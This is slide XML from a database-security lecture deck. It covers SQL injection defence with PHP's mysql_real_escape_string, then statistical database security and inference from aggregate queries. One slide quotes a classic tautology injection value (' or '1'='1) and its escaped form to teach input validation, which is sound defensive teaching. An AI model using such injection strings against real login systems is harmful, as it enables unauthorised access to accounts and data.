            <a:chOff x="5326063" y="5557838"/>
            <a:chExt cx="3276600" cy="906289"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17417" name="文字方塊 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5326063" y="5557838"/>
              <a:ext cx="32766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Select max(salary) from </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-TW" sz="1800" baseline="0" dirty="0" err="1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Emp</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="向下箭號 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6581867" y="5913580"/>
              <a:ext cx="338138" cy="238080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609600" indent="-609600"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419" name="文字方塊 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6054725" y="6095827"/>
              <a:ext cx="20066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aseline="0" dirty="0">
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="新細明體" charset="-120"/>
                  <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>CEO’s salary?</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" baseline="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體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17416" name="向右箭號 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3311525" y="5976938"/>
            <a:ext cx="266700" cy="263525"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50232"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0028A8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pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 4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1450" y="5341938"/>
            <a:ext cx="105886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Filter Input (Input Validation)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US">
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6451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FE8F28-3A80-486A-A0F8-0D3871F57F95}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:pPr/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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457200" y="4304581"/>
            <a:ext cx="8453887" cy="1639019"/>
            <a:chOff x="457200" y="4304581"/>
            <a:chExt cx="8453887" cy="1639019"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="457200" y="4304581"/>
              <a:ext cx="8453887" cy="1639019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09600" marR="0" indent="-609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itchFamily="2" charset="2"/>
                <a:buNone/>
                <a:tabLst/>
              </a:pPr>
              <a:endParaRPr kumimoji="0" lang="zh-TW" altLang="en-US" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="-2500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530589" y="4399691"/>
              <a:ext cx="8281259" cy="1448514"/>
              <a:chOff x="317457" y="4557852"/>
              <a:chExt cx="8281259" cy="1448514"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="64516" name="矩形 7"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="317457" y="4557852"/>
                <a:ext cx="8281259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800" baseline="0" dirty="0">
                    <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t>$query = </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1800" baseline="0" dirty="0" err="1">
                    <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t>sprintf</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1800" baseline="0" dirty="0">
                    <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t>("SELECT * FROM Users WHERE UserName='%s' AND Password='%s'",</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" baseline="0" dirty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64517" name="矩形 8"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1885951" y="4927740"/>
                <a:ext cx="6645654" cy="646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800" baseline="0" dirty="0" err="1">
                    <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t>mysql_real_escape_string</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1800" baseline="0" dirty="0">
                    <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t>($Username), </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1800" baseline="0" dirty="0" err="1">
                    <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t>mysql_real_escape_string</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1800" baseline="0" dirty="0">
                    <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t>($Password));                        /* PHP function</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" baseline="0" dirty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  <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="64518" name="矩形 9"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="364863" y="5638066"/>
                <a:ext cx="30543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aseline="0" dirty="0" err="1">
                    <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t>mysql_query</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1800" baseline="0" dirty="0">
                    <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                    <a:ea typeface="新細明體" charset="-120"/>
                  </a:rPr>
                  <a:t>($query);  </a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800" baseline="0" dirty="0">
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="新細明體" charset="-120"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64519" name="矩形 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="593725" y="1127714"/>
            <a:ext cx="8464550" cy="281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buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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Function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" baseline="0" dirty="0" smtClean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 err="1" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>(String)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" baseline="0" dirty="0" smtClean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prepends</a:t>
            </a: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backslashes</a:t>
            </a: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aseline="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>(\) </a:t>
            </a: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to the following characters in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>String: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>    \x00, \n, \r, \, ', " </a:t>
            </a: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and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>\x1a</a:t>
            </a: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.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="268288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800" baseline="0" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="268288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baseline="0" dirty="0" smtClean="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" baseline="0" dirty="0">
              <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              <a:ea typeface="新細明體" charset="-120"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="268288">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pP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$Username:  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 or '1'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'1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="268288">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" baseline="0" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>mysql_real_escape_string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" baseline="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>($Username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):  \' or \'1\'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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" b="1" baseline="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" baseline="0" dirty="0">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="新細明體" charset="-120"/>
              </a:rPr>
              <a:t>\'1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0" y="0"/>
            <a:ext cx="9144000" cy="7170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2064" y="354711"/>
            <a:ext cx="7243269" cy="3294063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ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Chapter 25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4800" b="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Introduction to Database Security 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4800" b="1" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Part 2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7" y="4003485"/>
            <a:ext cx="7634385" cy="22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56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F56A31-0B7B-4D03-A578-2778551917C9}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" baseline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Chapter Outline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303338"/>
            <a:ext cx="8048625" cy="49974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  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Introduction to Database Security Issues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  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Discretionary Access Control Based on Granting Revoking Privileges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  <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Mandatory Access Control and Role-Based Access Control for Multilevel Security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solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc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Introduction to Statistical Database Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1"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Introduction to Flow Control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1"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Encryption and Public Key Infrastructures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1"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Privacy Issues and Preservation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1"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Challenges of Database Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200" eaLnBrk="1" hangingPunct="1">
              <a:buClrTx/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" b="1" dirty="0">
                <a:ea typeface="新細明體" pitchFamily="18" charset="-120"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Oracle Label-Based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2587818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43925" y="6386513"/>
            <a:ext cx="51435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8F61683-E089-44DB-9CC5-ECC2F2D16726}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" baseline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Statistical Database Security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69975"/>
            <a:ext cx="8774112" cy="36703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Statistical databases </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>are used mainly to produce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statistics</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> on various populations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/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 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population</a:t>
            </a:r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is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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 set of tuples </a:t>
            </a:r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of a relation that satisfy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW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some selection condition</a:t>
            </a:r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Users are permitted to retrieve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statistical information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>on the populations, such as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averages, sums, counts, maximums, minimums, and standard deviations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  <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400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Confidential</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> data on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individuals </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>should be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protected</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> from user access.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04850" y="4816475"/>
            <a:ext cx="7839075" cy="1632646"/>
            <a:chOff x="704850" y="4816475"/>
            <a:chExt cx="7839075" cy="1632646"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15366" name="群組 20"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="704850" y="4903164"/>
              <a:ext cx="1590675" cy="1048250"/>
              <a:chOff x="704850" y="5147639"/>
              <a:chExt cx="1590675" cy="1048250"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15379" name="圓柱 4"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="704850" y="5147639"/>
                <a:ext cx="1590675" cy="991073"/>
              </a:xfrm>
              <a:prstGeom prst="can">
                <a:avLst>
                  <a:gd name="adj" fmla="val 25000"/>
                </a:avLst>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="952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80" name="文字方塊 5"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="800100" y="5241327"/>
                <a:ext cx="1381125" cy="95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TW" sz="2800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census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TW" sz="2800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data</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2800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15367" name="群組 21"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2230891" y="4816475"/>
              <a:ext cx="4530272" cy="1632646"/>
              <a:chOff x="2230891" y="5060950"/>
              <a:chExt cx="4530272" cy="1632646"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="15370" name="向右箭號 7"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2466975" y="5666999"/>
                <a:ext cx="904875" cy="333534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1" name="流程圖: 內部儲存裝置 8"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3505200" y="5155561"/>
                <a:ext cx="752475" cy="748069"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartInternalStorage">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="952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2" name="矩形 9"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3255963" y="5838825"/>
                <a:ext cx="124777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population</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800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3" name="矩形 10"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2359025" y="5060950"/>
                <a:ext cx="1108075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selection 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condition</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800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4" name="向右箭號 11"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4381500" y="5666999"/>
                <a:ext cx="904875" cy="333534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5" name="矩形 12"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5286375" y="5638800"/>
                <a:ext cx="1474788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Statistical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information</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800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6" name="流程圖: 文件 13"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5400675" y="5147639"/>
                <a:ext cx="1028700" cy="470105"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartDocument">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="952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marL="0" indent="-180000" eaLnBrk="1" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                </a:pPr>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="280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7" name="文字方塊 15"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2230891" y="6231711"/>
                <a:ext cx="3600450" cy="461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zh-TW" sz="24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Statistical Queries</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2400" b="1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78" name="矩形 17"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4286250" y="5060950"/>
                <a:ext cx="1120775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statistical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TW" sz="1800" b="1" baseline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function</a:t>
                </a:r>
                <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1800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pic>
          <p:nvPicPr>
            <p:cNvPr id="15368" name="Picture 18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1550" y="4816475"/>
              <a:ext cx="122237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向右箭號 18"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6732588" y="5118100"/>
              <a:ext cx="420687" cy="276225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2374219" y="5701884"/>
              <a:ext cx="827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baseline="0" dirty="0">
                  <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>DNO = 5</a:t>
              </a:r>
              <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1200" b="1" baseline="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563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48675" y="6386513"/>
            <a:ext cx="60960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6E47BF-87ED-4E7F-A1A0-7DD964AD70EF}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" baseline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Statistical Queries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01700"/>
            <a:ext cx="8774112" cy="413226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ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>Statistical queries </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>involve applying statistical functions to a population of tuples, such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to retrieve the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number of individuals </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>in a population or the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average income </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>in the population.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2200" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> allowed to retrieve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individual data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>, such as the income of a specific person</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty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Prohibit the retrieval of individual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by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prohibiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> queries that retrieve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attribute values</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/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ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>by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allowing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> only queries that involve </a:t>
            </a:r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statistical aggregate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2200" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>functions such as COUNT, SUM, MIN, MAX, AVERAGE, and STANDARD DEVIATION.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74" y="5077581"/>
            <a:ext cx="5669742" cy="13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24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C5B949-6CC9-4FAF-9BF0-F3F177E60759}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" baseline="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" baseline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Inferring Individual’s Information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42975"/>
            <a:ext cx="8369300" cy="1419225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It is possible to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infer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t> the values of individual tuples from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sequence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statistical queries</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0">
                <a:ea typeface="新細明體" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
